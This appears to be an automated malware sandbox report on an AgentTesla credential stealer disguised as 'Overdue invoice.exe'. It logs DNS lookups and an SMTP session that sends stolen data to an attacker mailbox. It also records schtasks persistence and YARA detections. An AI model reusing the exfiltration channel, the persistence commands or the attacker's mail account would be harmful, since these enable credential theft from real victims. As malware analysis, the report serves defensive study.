May 27, 2022 12:54:26.028583050 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.028840065 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.177023888 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.218147993 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.500936985 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.634860992 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.634953022 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.668198109 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.668311119 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.668384075 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.668456078 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:54:26.803858042 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.803900957 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.809715033 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:54:26.858817101 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:55:29.490083933 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:55:29.660953045 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:55:29.823596954 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
May 27, 2022 12:55:29.823791027 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:55:29.823844910 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188
May 27, 2022 12:55:29.954498053 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 12:53:49.667876959 CEST | 49316 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 12:53:50.838224888 CEST | 49316 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 12:53:50.942549944 CEST | 53 | 49316 | 8.8.8.8 | 192.168.2.3
May 27, 2022 12:54:22.740289927 CEST | 58116 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 12:54:22.844952106 CEST | 53 | 58116 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 12:53:49.667876959 CEST | 192.168.2.3 | 8.8.8.8 | 0xb85e | Standard query (0) | mail.jkudyog.com | A (IP address) | IN (0x0001)
May 27, 2022 12:53:50.838224888 CEST | 192.168.2.3 | 8.8.8.8 | 0xb85e | Standard query (0) | mail.jkudyog.com | A (IP address) | IN (0x0001)
May 27, 2022 12:54:22.740289927 CEST | 192.168.2.3 | 8.8.8.8 | 0xf7d3 | Standard query (0) | mail.jkudyog.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 12:53:50.942549944 CEST | 8.8.8.8 | 192.168.2.3 | 0xb85e | No error (0) | mail.jkudyog.com | | 206.183.111.188 | A (IP address) | IN (0x0001)
May 27, 2022 12:54:22.844952106 CEST | 8.8.8.8 | 192.168.2.3 | 0xf7d3 | No error (0) | mail.jkudyog.com | | 206.183.111.188 | A (IP address) | IN (0x0001)
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 27, 2022 12:53:51.877722979 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:23:51 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 27, 2022 12:53:51.957850933 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | EHLO 701188
May 27, 2022 12:53:52.088825941 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 250-hulk.rapidns.com Hello 701188 [102.129.143.42]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 27, 2022 12:53:52.178985119 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
May 27, 2022 12:53:52.310087919 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 27, 2022 12:53:52.507563114 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 235 Authentication succeeded
May 27, 2022 12:53:52.508352995 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | MAIL FROM:<ashutosh@jkudyog.com>
May 27, 2022 12:53:52.638927937 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 250 OK
May 27, 2022 12:53:52.639225006 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | RCPT TO:<markhung@jingtai.com.vn>
May 27, 2022 12:53:52.786659956 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 250 Accepted
May 27, 2022 12:53:52.786880970 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | DATA
May 27, 2022 12:53:52.917664051 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
May 27, 2022 12:53:52.919720888 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | .
May 27, 2022 12:53:53.054867029 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 250 OK id=1nuXbN-000NU7-4h
May 27, 2022 12:54:25.429943085 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:24:25 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 27, 2022 12:54:25.444358110 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | EHLO 701188
May 27, 2022 12:54:25.578612089 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 250-hulk.rapidns.com Hello 701188 [102.129.143.42]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 27, 2022 12:54:25.582864046 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
May 27, 2022 12:54:25.717389107 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 334 UGFzc3dvcmQ6
May 27, 2022 12:54:25.893343925 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 235 Authentication succeeded
May 27, 2022 12:54:25.893627882 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | MAIL FROM:<ashutosh@jkudyog.com>
May 27, 2022 12:54:26.028583050 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 250 OK
May 27, 2022 12:54:26.028840065 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | RCPT TO:<markhung@jingtai.com.vn>
May 27, 2022 12:54:26.177023888 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 250 Accepted
May 27, 2022 12:54:26.500936985 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | DATA
May 27, 2022 12:54:26.634953022 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
May 27, 2022 12:54:26.668456078 CEST | 49745 | 587 | 192.168.2.3 | 206.183.111.188 | .
May 27, 2022 12:54:26.809715033 CEST | 587 | 49745 | 206.183.111.188 | 192.168.2.3 | 250 OK id=1nuXbu-000NXK-Rm
May 27, 2022 12:55:29.490083933 CEST | 49715 | 587 | 192.168.2.3 | 206.183.111.188 | QUIT
May 27, 2022 12:55:29.823596954 CEST | 587 | 49715 | 206.183.111.188 | 192.168.2.3 | 221 hulk.rapidns.com closing connection

                                                  Target ID:0
                                                  Start time:12:53:16
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Overdue invoice.exe"
                                                  Imagebase:0x520000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:3
                                                  Start time:12:53:33
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                                                  Imagebase:0xf00000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:4
                                                  Start time:12:53:34
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c9170000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:5
                                                  Start time:12:53:34
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2f0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:7
                                                  Start time:12:53:35
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0xfe0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:15
                                                  Start time:12:53:53
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                  Imagebase:0x8d0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 60%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:16
                                                  Start time:12:54:01
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                  Imagebase:0x830000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:17
                                                  Start time:12:54:05
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                                                  Imagebase:0xf00000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:18
                                                  Start time:12:54:06
                                                  Start date:27/05/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c9170000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:19
                                                  Start time:12:54:06
                                                  Start date:27/05/2022
                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0xbe0000
                                                  File size:731648 bytes
                                                  MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  No disassembly